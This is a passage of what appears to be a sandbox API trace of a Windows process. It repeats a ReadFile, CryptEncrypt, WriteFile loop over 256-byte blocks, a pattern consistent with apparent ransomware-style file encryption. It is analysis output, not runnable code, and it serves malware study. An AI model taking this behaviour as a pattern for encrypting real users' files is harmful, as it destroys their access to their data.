lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.649] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.649] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.649] GetLastError () returned 0x0 [0149.649] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.649] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.649] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.649] GetLastError () returned 0x0 [0149.649] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.649] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.649] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.649] GetLastError () returned 0x0 [0149.649] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.649] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.649] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.650] GetLastError () returned 0x0 [0149.650] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.650] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.650] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.650] GetLastError () returned 0x0 [0149.650] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.650] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.650] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.650] GetLastError () returned 0x0 [0149.650] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.650] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.650] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.650] GetLastError () returned 0x0 [0149.650] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.650] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.650] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.650] GetLastError () returned 0x0 [0149.650] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.650] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.650] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.650] GetLastError () returned 0x0 [0149.650] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.650] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.650] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.650] GetLastError () returned 0x0 [0149.650] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.650] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.651] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.651] GetLastError () returned 0x0 [0149.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.651] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.651] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.651] GetLastError () returned 0x0 [0149.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.651] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.651] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.651] GetLastError () returned 0x0 [0149.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.651] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.651] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.651] GetLastError () returned 0x0 [0149.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.651] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.652] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.652] GetLastError () returned 0x0 [0149.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.652] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.652] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.652] GetLastError () returned 0x0 [0149.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.652] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.652] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.652] GetLastError () returned 0x0 [0149.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.652] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.652] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.652] GetLastError () returned 0x0 [0149.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.652] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.652] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.652] GetLastError () returned 0x0 [0149.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.652] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.652] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.652] GetLastError () returned 0x0 [0149.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.652] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.653] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.653] GetLastError () returned 0x0 [0149.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.653] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.653] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.653] GetLastError () returned 0x0 [0149.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.653] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.653] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.653] GetLastError () returned 0x0 [0149.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.653] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.653] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.653] GetLastError () returned 0x0 [0149.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.653] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.653] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.653] GetLastError () returned 0x0 [0149.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.653] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.653] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.653] GetLastError () returned 0x0 [0149.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.653] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.653] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.653] GetLastError () returned 0x0 [0149.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.654] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.654] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.654] GetLastError () returned 0x0 [0149.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.654] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.654] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.654] GetLastError () returned 0x0 [0149.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.654] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.654] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.654] GetLastError () returned 0x0 [0149.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.654] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.654] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.654] GetLastError () returned 0x0 [0149.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.654] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.654] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.654] GetLastError () returned 0x0 [0149.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.654] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, 